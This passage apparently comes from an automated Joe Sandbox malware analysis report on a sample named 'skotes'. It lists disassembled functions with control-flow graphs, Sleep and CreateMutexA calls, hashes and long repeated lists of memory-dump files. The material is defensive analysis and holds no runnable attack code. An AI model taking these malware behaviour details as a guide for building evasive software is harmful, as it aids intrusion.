                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797227905.0000000000090000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797249144.00000000000F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797326311.00000000000F9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797350265.00000000000FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797372218.0000000000107000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797500994.0000000000268000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797522618.000000000026B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797545804.0000000000279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797565834.000000000027B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797589743.000000000027D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797589743.0000000000285000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797632656.000000000028B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797654068.000000000028C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797689073.000000000028E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797709124.000000000028F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797800677.000000000029A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797840537.000000000029E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797874098.00000000002B7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797889592.00000000002C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797910125.00000000002C7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797934577.00000000002CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797967415.00000000002E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797983592.00000000002E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798008754.00000000002EE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798029578.00000000002EF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798050369.00000000002F0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798075626.00000000002F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798097991.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798120589.00000000002FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798144608.0000000000305000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798165916.0000000000308000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798188059.0000000000309000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798211528.0000000000310000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798236053.0000000000318000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798258007.0000000000319000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798280895.000000000031A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798302467.0000000000322000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798331068.0000000000332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798354983.0000000000333000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798376661.0000000000334000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798401189.0000000000336000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798401189.000000000035E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798458925.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798480237.0000000000376000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798504086.000000000038B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798527963.000000000038C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798548569.0000000000391000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798573458.0000000000393000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798598071.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798621459.00000000003A3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_90000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: 89eb3bda2b7a6b5b556cb4d3d015fa8db1496c33859c63c1095d5670e7f1ffa7
                                                                                                                                                                                                                                                  • Instruction ID: 2db75de0632c62a7478b7d78e9a0c884a92c15617fef907b2baa3fc17eb04659
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89eb3bda2b7a6b5b556cb4d3d015fa8db1496c33859c63c1095d5670e7f1ffa7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F311631B042409BEF189B7CCD89BADB7A2EBC3314F248619E014D77D5C77699849793
                                                                                                                                                                                                                                                  Function 0009A1AE Relevance: 3.1, APIs: 2, Instructions: 135sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 90 9a1ae-9a1ce 94 9a1fc-9a218 90->94 95 9a1d0-9a1dc 90->95 98 9a21a-9a226 94->98 99 9a246-9a265 94->99 96 9a1de-9a1ec 95->96 97 9a1f2-9a1f9 call ad663 95->97 96->97 100 9a935 96->100 97->94 102 9a228-9a236 98->102 103 9a23c-9a243 call ad663 98->103 104 9a293-9a916 call a80c0 99->104 105 9a267-9a273 99->105 107 9a953-9a994 Sleep CreateMutexA 100->107 108 9a935 call c6c6a 100->108 102->100 102->103 103->99 111 9a289-9a290 call ad663 105->111 112 9a275-9a283 105->112 120 9a9a7-9a9a8 107->120 121 9a996-9a998 107->121 108->107 111->104 112->100 112->111 121->120 122 9a99a-9a9a5 121->122 122->120
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 0009A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,000F3254), ref: 0009A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1797249144.0000000000091000.00000040.00000001.01000000.00000007.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797227905.0000000000090000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797249144.00000000000F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797326311.00000000000F9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797350265.00000000000FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797372218.0000000000107000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797500994.0000000000268000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797522618.000000000026B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797545804.0000000000279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797565834.000000000027B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797589743.000000000027D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797589743.0000000000285000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797632656.000000000028B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797654068.000000000028C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797689073.000000000028E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797709124.000000000028F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797800677.000000000029A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797840537.000000000029E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797874098.00000000002B7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797889592.00000000002C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797910125.00000000002C7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797934577.00000000002CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797967415.00000000002E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797983592.00000000002E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798008754.00000000002EE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798029578.00000000002EF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798050369.00000000002F0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798075626.00000000002F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798097991.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798120589.00000000002FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798144608.0000000000305000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798165916.0000000000308000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798188059.0000000000309000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798211528.0000000000310000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798236053.0000000000318000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798258007.0000000000319000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798280895.000000000031A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798302467.0000000000322000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798331068.0000000000332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798354983.0000000000333000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798376661.0000000000334000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798401189.0000000000336000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798401189.000000000035E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798458925.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798480237.0000000000376000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798504086.000000000038B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798527963.000000000038C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798548569.0000000000391000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798573458.0000000000393000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798598071.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798621459.00000000003A3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_90000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: 09fc2da0d8a551f17dc2e9efc7c5a55e1fc2f8bacdbb35a4fb8f4f476bf82e23
                                                                                                                                                                                                                                                  • Instruction ID: b3665c092f59765e5da85dcb282dbf66fbe83c4cac98dad9212621de12a8f556
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 09fc2da0d8a551f17dc2e9efc7c5a55e1fc2f8bacdbb35a4fb8f4f476bf82e23
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9312A31B042409BFF189BBCDC89BADB7B2EB87310F244619E014DB7D1D77699849792
                                                                                                                                                                                                                                                  Function 0009A418 Relevance: 3.1, APIs: 2, Instructions: 133sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 124 9a418-9a438 128 9a43a-9a446 124->128 129 9a466-9a482 124->129 132 9a448-9a456 128->132 133 9a45c-9a463 call ad663 128->133 130 9a4b0-9a4cf 129->130 131 9a484-9a490 129->131 137 9a4fd-9a916 call a80c0 130->137 138 9a4d1-9a4dd 130->138 135 9a492-9a4a0 131->135 136 9a4a6-9a4ad call ad663 131->136 132->133 139 9a93f-9a994 call c6c6a * 4 Sleep CreateMutexA 132->139 133->129 135->136 135->139 136->130 143 9a4df-9a4ed 138->143 144 9a4f3-9a4fa call ad663 138->144 160 9a9a7-9a9a8 139->160 161 9a996-9a998 139->161 143->139 143->144 144->137 161->160 162 9a99a-9a9a5 161->162 162->160
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 0009A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,000F3254), ref: 0009A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1797249144.0000000000091000.00000040.00000001.01000000.00000007.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797227905.0000000000090000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797249144.00000000000F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797326311.00000000000F9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797350265.00000000000FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797372218.0000000000107000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797500994.0000000000268000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797522618.000000000026B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797545804.0000000000279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797565834.000000000027B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797589743.000000000027D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797589743.0000000000285000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797632656.000000000028B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797654068.000000000028C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797689073.000000000028E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797709124.000000000028F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797800677.000000000029A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797840537.000000000029E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797874098.00000000002B7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797889592.00000000002C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797910125.00000000002C7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797934577.00000000002CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797967415.00000000002E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797983592.00000000002E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798008754.00000000002EE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798029578.00000000002EF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798050369.00000000002F0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798075626.00000000002F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798097991.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798120589.00000000002FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798144608.0000000000305000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798165916.0000000000308000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798188059.0000000000309000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798211528.0000000000310000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798236053.0000000000318000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798258007.0000000000319000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798280895.000000000031A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798302467.0000000000322000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798331068.0000000000332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798354983.0000000000333000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798376661.0000000000334000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798401189.0000000000336000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798401189.000000000035E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798458925.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798480237.0000000000376000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798504086.000000000038B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798527963.000000000038C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798548569.0000000000391000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798573458.0000000000393000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798598071.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798621459.00000000003A3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_90000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: bb1d0e3efe5da980714cc8ae2cc2444a39643433e0bec073643c6d47e0d6435a
                                                                                                                                                                                                                                                  • Instruction ID: ba0b7a68be0a65565d7a9c9908978a901a137d07920121616790eb9074da9dc4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb1d0e3efe5da980714cc8ae2cc2444a39643433e0bec073643c6d47e0d6435a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B3310931B402409BEF18ABBCDCC9BADB761EBC3314F244618E014DB6D6DBB599849693
                                                                                                                                                                                                                                                  Function 0009A54D Relevance: 3.1, APIs: 2, Instructions: 132sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 164 9a54d-9a56d 168 9a59b-9a5b7 164->168 169 9a56f-9a57b 164->169 172 9a5b9-9a5c5 168->172 173 9a5e5-9a604 168->173 170 9a57d-9a58b 169->170 171 9a591-9a598 call ad663 169->171 170->171 178 9a944-9a994 call c6c6a * 3 Sleep CreateMutexA 170->178 171->168 174 9a5db-9a5e2 call ad663 172->174 175 9a5c7-9a5d5 172->175 176 9a632-9a916 call a80c0 173->176 177 9a606-9a612 173->177 174->173 175->174 175->178 181 9a628-9a62f call ad663 177->181 182 9a614-9a622 177->182 198 9a9a7-9a9a8 178->198 199 9a996-9a998 178->199 181->176 182->178 182->181 199->198 200 9a99a-9a9a5 199->200 200->198
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 0009A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,000F3254), ref: 0009A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1797249144.0000000000091000.00000040.00000001.01000000.00000007.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797227905.0000000000090000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797249144.00000000000F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797326311.00000000000F9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797350265.00000000000FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797372218.0000000000107000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797500994.0000000000268000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797522618.000000000026B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797545804.0000000000279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797565834.000000000027B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797589743.000000000027D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797589743.0000000000285000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797632656.000000000028B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797654068.000000000028C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797689073.000000000028E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797709124.000000000028F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797800677.000000000029A000.00000080.00000001.01000000.00000007.sdmpDownload File
